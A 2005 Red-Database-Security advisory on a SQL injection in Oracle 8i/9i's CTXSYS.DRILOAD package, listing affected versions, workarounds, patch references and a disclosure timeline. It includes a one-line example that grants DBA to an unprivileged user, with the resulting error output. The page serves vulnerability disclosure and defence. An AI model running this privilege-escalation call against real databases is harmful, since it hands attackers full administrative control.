Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
SQL Injection via CTXSYS.DRILOAD in Oracle 8i/9i

Name SQL Injection via CTXSYS.DRILOAD in Oracle8i - 9i
Systems Affected Oracle 8.i - Oracle9i (all platforms)
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Advisory 25 Apr 2005 (V 1.01)
Bugno RDS_20040903_1
Time to fix 239 days


Details
Any valid database user can become DBA (if CTXSYS is installed) by executing the package DRILOAD
by submitting a specially crafted parameter.

Oracle 10g is NOT affected.

Workarounds
Drop user CTXSYS (if not needed) or revoke public grant from CTXSYS.DRILOAD.


Example
sqlplus scott/tiger@ora902 (or every other unprivileged user)

SQL> exec ctxsys.driload.validate_stmt('grant dba to scott');

BEGIN ctxsys.driload.validate_stmt('grant dba to scott'); END;
*
ERROR at line 1:
ORA-06510: PL/SQL: unhandled user-defined exception
ORA-06512: at "CTXSYS.DRILOAD", line 42
ORA-01003: no statement parsed
ORA-06512: at line 1

Patch Information
Please see MetaLink document ID 281189.1 for the patch download procedures and for the Patch Availability Matrix for this Oracle Security Alert.

[metalink.oracle.com]

History
05-jan-2004 Oracle secalert was informed
06-jan-2004 Bug confirmed
31-aug-2004 Oracle published alert 68
25-apr-2005 Example and time to fix added


2005 by Red-Database-Security GmbH - last update 03-nov-2005

Oracle Workflow

Oracle Workflow is a complete business process management solution embedded in the Oracle database.

Its technology enables modeling, automation, and continuous improvement of business processes, routing information of any type according to user-defined business rules.

Oracle Workflow provides customers a scalable, production workflow system tuned for the high volumes associated with enterprise applications.